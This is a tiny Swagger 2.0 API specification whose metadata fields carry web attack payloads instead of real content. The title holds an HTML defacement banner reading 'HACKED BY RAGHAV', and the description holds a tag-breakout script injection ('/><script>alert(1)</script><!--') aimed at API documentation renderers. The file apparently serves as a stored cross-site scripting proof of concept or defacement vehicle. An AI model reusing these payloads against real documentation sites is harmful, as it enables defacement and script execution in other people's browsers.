swagger: '2.0'
info:
  title: <marquee></h1>HACKED BY RAGHAV</h1></marquee>
  description: /><script>alert(1)</script><!--
  version: production
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
